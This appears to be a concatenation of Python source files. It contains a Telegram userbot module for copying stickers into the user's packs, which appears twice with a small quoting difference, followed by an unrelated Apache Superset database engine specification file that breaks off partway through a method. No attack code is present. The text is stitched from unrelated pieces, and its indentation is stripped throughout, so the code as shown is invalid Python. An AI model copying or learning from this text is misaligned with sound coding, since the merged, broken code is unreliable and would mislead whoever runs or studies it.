import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Using Witchery to kang this sticker...",
"Plagiarising hehe...",
"Inviting this sticker over to my pack...",
"Kanging this sticker...",
"Hey that's a nice sticker!\nMind if I kang?!..",
"hehe me stel ur stikér\nhehe.",
"Ay look over there (☉。☉)!→\nWhile I kang this...",
"Roses are red violets are blue, kanging this sticker so my pacc looks cool",
"Imprisoning this sticker...",
"Mr.Steal Your Sticker is stealing this sticker... ",
]
@register(outgoing=True, pattern="^.kang")
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
user.username = user.first_name
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "🤔"
pack = 1
if len(splat) == 3:
pack = splat[2] # User sent both
emoji = splat[1]
elif len(splat) == 2:
if splat[1].isnumeric():
# User wants to push into different pack, but is okay with
# thonk as emote.
pack = int(splat[1])
else:
# User sent just custom emote, wants to push to default
# pack
emoji = splat[1]
packname = f"Uni_Borg_{user.id}"
packnick = f"Param's Pack"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "120" in x.text:
pack += 1
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
await conv.get_response()
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker kanged successfully!`\
\nPack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
@register(outgoing=True, pattern="^.stkrinfo$")
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{" ".join(pack_emojis)}"
await event.edit(OUTPUT)
CMD_HELP.update({
"stickers":
".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Using Witchery to kang this sticker...",
"Plagiarising hehe...",
"Inviting this sticker over to my pack...",
"Kanging this sticker...",
"Hey that's a nice sticker!\nMind if I kang?!..",
"hehe me stel ur stikér\nhehe.",
"Ay look over there (☉。☉)!→\nWhile I kang this...",
"Roses are red violets are blue, kanging this sticker so my pacc looks cool",
"Imprisoning this sticker...",
"Mr.Steal Your Sticker is stealing this sticker... ",
]
@register(outgoing=True, pattern="^.kang")
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
user.username = user.first_name
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "🤔"
pack = 1
if len(splat) == 3:
pack = splat[2] # User sent both
emoji = splat[1]
elif len(splat) == 2:
if splat[1].isnumeric():
# User wants to push into different pack, but is okay with
# thonk as emote.
pack = int(splat[1])
else:
# User sent just custom emote, wants to push to default
# pack
emoji = splat[1]
packname = f"Uni_Borg_{user.id}"
packnick = f"Param's Pack"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "120" in x.text:
pack += 1
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
await conv.get_response()
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker kanged successfully!`\
\nPack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
@register(outgoing=True, pattern="^.stkrinfo$")
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
await event.edit(OUTPUT)
CMD_HELP.update({
"stickers":
".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import json
import logging
import re
from contextlib import closing
from datetime import datetime
from typing import (
Any,
Callable,
Dict,
List,
Match,
NamedTuple,
Optional,
Pattern,
Set,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import pandas as pd
import sqlparse
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask import current_app, g
from flask_babel import gettext as __, lazy_gettext as _
from marshmallow import fields, Schema
from marshmallow.validate import Range
from sqlalchemy import column, select, types
from sqlalchemy.engine.base import Engine
from sqlalchemy.engine.interfaces import Compiled, Dialect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.orm import Session
from sqlalchemy.sql import quoted_name, text
from sqlalchemy.sql.expression import ColumnClause, Select, TextAsFrom, TextClause
from sqlalchemy.types import TypeEngine
from typing_extensions import TypedDict
from superset import security_manager, sql_parse
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.models.sql_lab import Query
from superset.models.sql_types.base import literal_dttm_type_factory
from superset.sql_parse import ParsedQuery, Table
from superset.utils import core as utils
from superset.utils.core import ColumnSpec, GenericDataType
from superset.utils.hashing import md5_sha_from_str
from superset.utils.network import is_hostname_valid, is_port_open
if TYPE_CHECKING:
# prevent circular imports
from superset.connectors.sqla.models import TableColumn
from superset.models.core import Database
ColumnTypeMapping = Tuple[
Pattern[str],
Union[TypeEngine, Callable[[Match[str]], TypeEngine]],
GenericDataType,
]
logger = logging.getLogger()
class TimeGrain(NamedTuple):
name: str # TODO: redundant field, remove
label: str
function: str
duration: Optional[str]
builtin_time_grains: Dict[Optional[str], str] = {
None: __("Original value"),
"PT1S": __("Second"),
"PT5S": __("5 second"),
"PT30S": __("30 second"),
"PT1M": __("Minute"),
"PT5M": __("5 minute"),
"PT10M": __("10 minute"),
"PT15M": __("15 minute"),
"PT30M": __("30 minute"),
"PT1H": __("Hour"),
"PT6H": __("6 hour"),
"P1D": __("Day"),
"P1W": __("Week"),
"P1M": __("Month"),
"P3M": __("Quarter"),
"P1Y": __("Year"),
"1969-12-28T00:00:00Z/P1W": __("Week starting Sunday"),
"1969-12-29T00:00:00Z/P1W": __("Week starting Monday"),
"P1W/1970-01-03T00:00:00Z": __("Week ending Saturday"),
"P1W/1970-01-04T00:00:00Z": __("Week_ending Sunday"),
}
class TimestampExpression(ColumnClause): # pylint: disable=abstract-method
def __init__(self, expr: str, col: ColumnClause, **kwargs: Any) -> None:
"""Sqlalchemy class that can be can be used to render native column elements
respeting engine-specific quoting rules as part of a string-based expression.
:param expr: Sql expression with '{col}' denoting the locations where the col
object will be rendered.
:param col: the target column
"""
super().__init__(expr, **kwargs)
self.col = col
@property
def _constructor(self) -> ColumnClause:
# Needed to ensure that the column label is rendered correctly when
# proxied to the outer query.
# See https://github.com/sqlalchemy/sqlalchemy/issues/4730
return ColumnClause
@compiles(TimestampExpression)
def compile_timegrain_expression(
element: TimestampExpression, compiler: Compiled, **kwargs: Any
) -> str:
return element.name.replace("{col}", compiler.process(element.col, **kwargs))
class LimitMethod: # pylint: disable=too-few-public-methods
"""Enum the ways that limits can be applied"""
FETCH_MANY = "fetch_many"
WRAP_SQL = "wrap_sql"
FORCE_LIMIT = "force_limit"
class BaseEngineSpec: # pylint: disable=too-many-public-methods
"""Abstract class for database engine specific configurations
Attributes:
allows_alias_to_source_column: Whether the engine is able to pick the
source column for aggregation clauses
used in ORDER BY when a column in SELECT
has an alias that is the same as a source
column.
allows_hidden_orderby_agg: Whether the engine allows ORDER BY to
directly use aggregation clauses, without
having to add the same aggregation in SELECT.
"""
engine = "base" # str as defined in sqlalchemy.engine.engine
engine_aliases: Set[str] = set()
engine_name: Optional[str] = None # for user messages, overridden in child classes
_date_trunc_functions: Dict[str, str] = {}
_time_grain_expressions: Dict[Optional[str], str] = {}
column_type_mappings: Tuple[ColumnTypeMapping, ...] = (
(
re.compile(r"^string", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^n((var)?char|text)", re.IGNORECASE),
types.UnicodeText(),
GenericDataType.STRING,
),
(
re.compile(r"^(var)?char", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^(tiny|medium|long)?text", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^smallint", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^int(eger)?", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigint", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(re.compile(r"^long", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^decimal", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^numeric", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(re.compile(r"^float", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^double", re.IGNORECASE),
types.Float(),
GenericDataType.NUMERIC,
),
(re.compile(r"^real", re.IGNORECASE), types.REAL, GenericDataType.NUMERIC,),
(
re.compile(r"^smallserial", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^serial", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigserial", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^money", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^timestamp", re.IGNORECASE),
types.TIMESTAMP(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^datetime", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^date", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(re.compile(r"^time", re.IGNORECASE), types.Time(), GenericDataType.TEMPORAL,),
(
re.compile(r"^interval", re.IGNORECASE),
types.Interval(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^bool(ean)?", re.IGNORECASE),
types.Boolean(),
GenericDataType.BOOLEAN,
),
)
# Does database support join-free timeslot grouping
time_groupby_inline = False
limit_method = LimitMethod.FORCE_LIMIT
time_secondary_columns = False
allows_joins = True
allows_subqueries = True
allows_alias_in_select = True
allows_alias_in_orderby = True
allows_sql_comments = True
allows_escaped_colons = True
# Whether ORDER BY clause can use aliases created in SELECT
# that are the same as a source column
allows_alias_to_source_column = True
# Whether ORDER BY clause must appear in SELECT
# if TRUE, then it doesn't have to.
allows_hidden_ordeby_agg = True
# Whether ORDER BY clause can use sql caculated expression
# if True, use alias of select column for `order by`
# the True is safely for most database
# But for backward compatibility, False by default
allows_hidden_cc_in_orderby = False
force_column_alias_quotes = False
arraysize = 0
max_column_name_length = 0
try_remove_schema_from_table_name = True # pylint: disable=invalid-name
run_multiple_statements_as_one = False
custom_errors: Dict[
Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]
] = {}
@classmethod
def get_dbapi_exception_mapping(cls) -> Dict[Type[Exception], Type[Exception]]:
"""
Each engine can implement and converge its own specific exceptions into
Superset DBAPI exceptions
Note: On python 3.9 this method can be changed to a classmethod property
without the need of implementing a metaclass type
:return: A map of driver specific exception to superset custom exceptions
"""
return {}
@classmethod
def get_dbapi_mapped_exception(cls, exception: Exception) -> Exception:
"""
Get a superset custom DBAPI exception from the driver specific exception.
Override if the engine needs to perform extra changes to the exception, for
example change the exception message or implement custom more complex logic
:param exception: The driver specific exception
:return: Superset custom DBAPI exception
"""
new_exception = cls.get_dbapi_exception_mapping().get(type(exception))
if not new_exception:
return exception
return new_exception(str(exception))
@classmethod
def get_allow_cost_estimate( # pylint: disable=unused-argument
cls, extra: Dict[str, Any],
) -> bool:
return False
@classmethod
def get_text_clause(cls, clause: str) -> TextClause:
"""
SQLALchemy wrapper to ensure text clauses are escaped properly
:param clause: string clause with potentially unescaped characters
:return: text clause with escaped characters
"""
if cls.allows_escaped_colons:
clause = clause.replace(":", "\\:")
return text(clause)
@classmethod
def get_engine(
cls,
database: "Database",
schema: Optional[str] = None,
source: Optional[utils.QuerySource] = None,
) -> Engine:
user_name = utils.get_username()
return database.get_sqla_engine(
schema=schema, nullpool=True, user_name=user_name, source=source
)
@classmethod
def get_timestamp_expr(
cls,
col: ColumnClause,
pdf: Optional[str],
time_grain: Optional[str],
type_: Optional[str] = None,
) -> TimestampExpression:
"""
Construct a TimestampExpression to be used in a SQLAlchemy query.
:param col: Target column for the TimestampExpression
:param pdf: date format (seconds or milliseconds)
:param time_grain: time grain, e.g. P1Y for 1 year
:param type_: the source column type
:return: TimestampExpression object
"""
if time_grain:
time_expr = cls.get_time_grain_expressions().get(time_grain)
if not time_expr:
raise NotImplementedError(
f"No grain spec for {time_grain} for database {cls.engine}"
)
if type_ and "{func}" in time_expr:
date_trunc_function = cls._date_trunc_functions.get(type_)
if date_trunc_function:
time_expr = time_expr.replace("{func}", date_trunc_function)
if type_ and "{type}" in time_expr:
date_trunc_function = cls._date_trunc_functions.get(type_)
if date_trunc_function:
time_expr = time_expr.replace("{type}", type_)
else:
time_expr = "{col}"
# if epoch, translate to DATE using db specific conf
if pdf == "epoch_s":
time_expr = time_expr.replace("{col}", cls.epoch_to_dttm())
elif pdf == "epoch_ms":
time_expr = time_expr.replace("{col}", cls.epoch_ms_to_dttm())
return TimestampExpression(time_expr, col, type_=col.type)
@classmethod
def get_time_grains(cls) -> Tuple[TimeGrain, ...]:
"""
Generate a tuple of supported time grains.
:return: All time grains supported by the engine
"""
ret_list = []
time_grains = builtin_time_grains.copy()
time_grains.update(current_app.config["TIME_GRAIN_ADDONS"])
for duration, func in cls.get_time_grain_expressions().items():
if duration in time_grains:
name = time_grains[duration]
ret_list.append(TimeGrain(name, _(name), func, duration))
return tuple(ret_list)
@classmethod
def _sort_time_grains(
cls, val: Tuple[Optional[str], str], index: int
) -> Union[float, int, str]:
"""
Return an ordered time-based value of a portion of a time grain
for sorting
Values are expected to be either None or start with P or PT
Have a numerical value in the middle and end with
a value for the time interval
It can also start or end with epoch start time denoting a range
i.e, week beginning or ending with a day
"""
pos = {
"FIRST": 0,
"SECOND": 1,
"THIRD": 2,
"LAST": 3,
}
if val[0] is None:
return pos["FIRST"]
prog = re.compile(r"(.*\/)?(P|PT)([0-9\.]+)(S|M|H|D|W|M|Y)(\/.*)?")
result = prog.match(val[0])
# for any time grains that don't match the format, put them at the end
if result is None:
return pos["LAST"]
second_minute_hour = ["S", "M", "H"]
day_week_month_year = ["D", "W", "M", "Y"]
is_less_than_day = result.group(2) == "PT"
interval = result.group(4)
epoch_time_start_string = result.group(1) or result.group(5)
has_starting_or_ending = bool(len(epoch_time_start_string or ""))
def sort_day_week() -> int:
if has_starting_or_ending:
return pos["LAST"]
if is_less_than_day:
return pos["SECOND"]
return pos["THIRD"]
def sort_interval() -> float:
if is_less_than_day:
return second_minute_hour.index(interval)
return day_week_month_year.index(interval)
# 0: all "PT" values should come before "P" values (i.e, PT10M)
# 1: order values within the above arrays ("D" before "W")
# 2: sort by numeric value (PT10M before PT15M)
# 3: sort by any week starting/ending values
plist = {
0: sort_day_week(),
1: pos["SECOND"] if is_less_than_day else pos["THIRD"],
2: sort_interval(),
3: float(result.group(3)),
}
return plist.get(index, 0)
@classmethod
def get_time_grain_expressions(cls) -> Dict[Optional[str], str]:
"""
Return a dict of all supported time grains including any potential added grains
but excluding any potentially disabled grains in the config file.
:return: All time grain expressions supported by the engine
"""
# TODO: use @memoize decorator or similar to avoid recomputation on every call
time_grain_expressions = cls._time_grain_expressions.copy()
grain_addon_expressions = current_app.config["TIME_GRAIN_ADDON_EXPRESSIONS"]
time_grain_expressions.update(grain_addon_expressions.get(cls.engine, {}))
denylist: List[str] = current_app.config["TIME_GRAIN_DENYLIST"]
for key in denylist:
time_grain_expressions.pop(key)
